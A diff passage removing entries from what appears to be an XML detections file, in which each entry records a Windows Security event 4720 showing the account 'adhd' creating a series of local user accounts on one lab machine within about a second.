-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Eugene</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4531</recordid>
-            <time>2020-06-11 22:04:58.692479100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.6924791Z'/&gt;&lt;EventRecordID&gt;4531&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jeremy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1081&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jeremy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jeremy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4525</recordid>
-            <time>2020-06-11 22:04:58.622986800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.6229868Z'/&gt;&lt;EventRecordID&gt;4525&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Wayne&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1080&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Wayne&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Wayne</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4519</recordid>
-            <time>2020-06-11 22:04:58.539431200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.5394312Z'/&gt;&lt;EventRecordID&gt;4519&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Laura&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1079&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Laura&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Laura</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4513</recordid>
-            <time>2020-06-11 22:04:58.448591100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.4485911Z'/&gt;&lt;EventRecordID&gt;4513&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Eric&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1078&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Eric&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Eric</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4507</recordid>
-            <time>2020-06-11 22:04:58.356612800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.3566128Z'/&gt;&lt;EventRecordID&gt;4507&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Russell&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1077&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Russell&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Russell</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4501</recordid>
-            <time>2020-06-11 22:04:58.268168600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.2681686Z'/&gt;&lt;EventRecordID&gt;4501&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;John&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1076&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;John&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>John</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4495</recordid>
-            <time>2020-06-11 22:04:58.192888400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.1928884Z'/&gt;&lt;EventRecordID&gt;4495&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jesse&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1075&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jesse&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jesse</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4489</recordid>
-            <time>2020-06-11 22:04:58.75387800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.0753878Z'/&gt;&lt;EventRecordID&gt;4489&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Alan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1074&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Alan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Alan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4483</recordid>
-            <time>2020-06-11 22:04:57.991047100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.9910471Z'/&gt;&lt;EventRecordID&gt;4483&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Walter&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1073&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Walter&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

